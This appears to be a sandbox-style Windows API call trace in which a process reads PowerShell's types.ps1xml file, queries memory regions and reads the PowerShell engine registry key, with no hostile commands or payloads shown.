	[0062.095] GetSystemInfo (in: lpSystemInfo=0xadee8 | out: lpSystemInfo=0xadee8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0062.095] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae27c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0062.103] GetLastError () returned 0x0
	[0062.103] SetErrorMode (uMode=0x1) returned 0x1
	[0062.103] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0062.104] GetLastError () returned 0x0
	[0062.104] GetFileType (hFile=0x330) returned 0x1
	[0062.104] SetErrorMode (uMode=0x1) returned 0x1
	[0062.104] GetFileType (hFile=0x330) returned 0x1
	[0062.104] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.105] GetLastError () returned 0x0
	[0062.106] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.106] GetLastError () returned 0x0
	[0062.106] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.106] GetLastError () returned 0x0
	[0062.107] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.107] GetLastError () returned 0x0
	[0062.107] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.107] GetLastError () returned 0x0
	[0062.108] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.108] GetLastError () returned 0x0
	[0062.108] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.108] GetLastError () returned 0x0
	[0062.108] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.108] GetLastError () returned 0x0
	[0062.108] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.108] GetLastError () returned 0x0
	[0062.110] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.110] GetLastError () returned 0x0
	[0062.110] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.110] GetLastError () returned 0x0
	[0062.110] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.110] GetLastError () returned 0x0
	[0062.110] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.110] GetLastError () returned 0x0
	[0062.110] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.111] GetLastError () returned 0x0
	[0062.111] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.111] GetLastError () returned 0x0
	[0062.111] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.111] GetLastError () returned 0x0
	[0062.111] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.111] GetLastError () returned 0x0
	[0062.113] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.114] GetLastError () returned 0x0
	[0062.114] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.114] GetLastError () returned 0x0
	[0062.114] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.114] GetLastError () returned 0x0
	[0062.114] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.114] GetLastError () returned 0x0
	[0062.114] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.114] GetLastError () returned 0x0
	[0062.115] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.115] GetLastError () returned 0x0
	[0062.115] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.115] GetLastError () returned 0x0
	[0062.115] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.115] GetLastError () returned 0x0
	[0062.115] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.115] GetLastError () returned 0x0
	[0062.115] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.115] GetLastError () returned 0x0
	[0062.116] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.116] GetLastError () returned 0x0
	[0062.116] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.116] GetLastError () returned 0x0
	[0062.116] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.116] GetLastError () returned 0x0
	[0062.116] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.116] GetLastError () returned 0x0
	[0062.116] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.117] GetLastError () returned 0x0
	[0062.117] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.117] GetLastError () returned 0x0
	[0062.122] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.122] GetLastError () returned 0x0
	[0062.122] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.122] GetLastError () returned 0x0
	[0062.123] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.123] GetLastError () returned 0x0
	[0062.123] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.123] GetLastError () returned 0x0
	[0062.123] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.123] GetLastError () returned 0x0
	[0062.124] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.124] GetLastError () returned 0x0
	[0062.124] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.124] GetLastError () returned 0x0
	[0062.124] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.124] GetLastError () returned 0x0
	[0062.124] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x1b4, lpOverlapped=0x0) returned 1
	[0062.125] GetLastError () returned 0x0
	[0062.125] ReadFile (in: hFile=0x330, lpBuffer=0x1fb87a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1fb87a8*, lpNumberOfBytesRead=0xae7e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.125] GetLastError () returned 0x0
	[0062.125] CloseHandle (hObject=0x330) returned 1
	[0062.125] GetLastError () returned 0x0
	[0062.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0062.125] GetLastError () returned 0x0
	[0062.125] SetErrorMode (uMode=0x1) returned 0x1
	[0062.125] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1fd9038 | out: lpFileInformation=0x1fd9038*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0062.125] GetLastError () returned 0x0
	[0062.125] SetErrorMode (uMode=0x1) returned 0x1
	[0062.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0062.125] GetLastError () returned 0x0
	[0062.126] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae768 | out: phkResult=0xae768*=0x330) returned 0x0
	[0062.126] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae7b0, lpData=0x0, lpcbData=0xae7ac*=0x0 | out: lpType=0xae7b0*=0x1, lpData=0x0, lpcbData=0xae7ac*=0x56) returned 0x0
	[0062.126] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae7b0, lpData=0x242ad0, lpcbData=0xae7ac*=0x56 | out: lpType=0xae7b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae7ac*=0x56) returned 0x0
	[0062.126] RegCloseKey (hKey=0x330) returned 0x0
	[0062.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0062.126] GetLastError () returned 0x0
	[0062.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0062.126] GetLastError () returned 0x0
	[0062.292] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.296] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.298] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.298] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.299] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.299] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.300] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.302] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.311] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.311] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.311] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.312] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.312] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.313] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.313] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.314] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.319] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.321] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.322] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.323] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.324] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.325] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.326] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.326] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.326] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.327] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.327] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.328] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.328] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.328] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.331] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.336] VirtualQuery (in: lpAddress=0xad6a8, lpBuffer=0xae6a8, dwLength=0x1c | out: lpBuffer=0xae6a8*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.336] VirtualQuery (in: lpAddress=0xad6a8, lpBuffer=0xae6a8, dwLength=0x1c | out: lpBuffer=0xae6a8*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
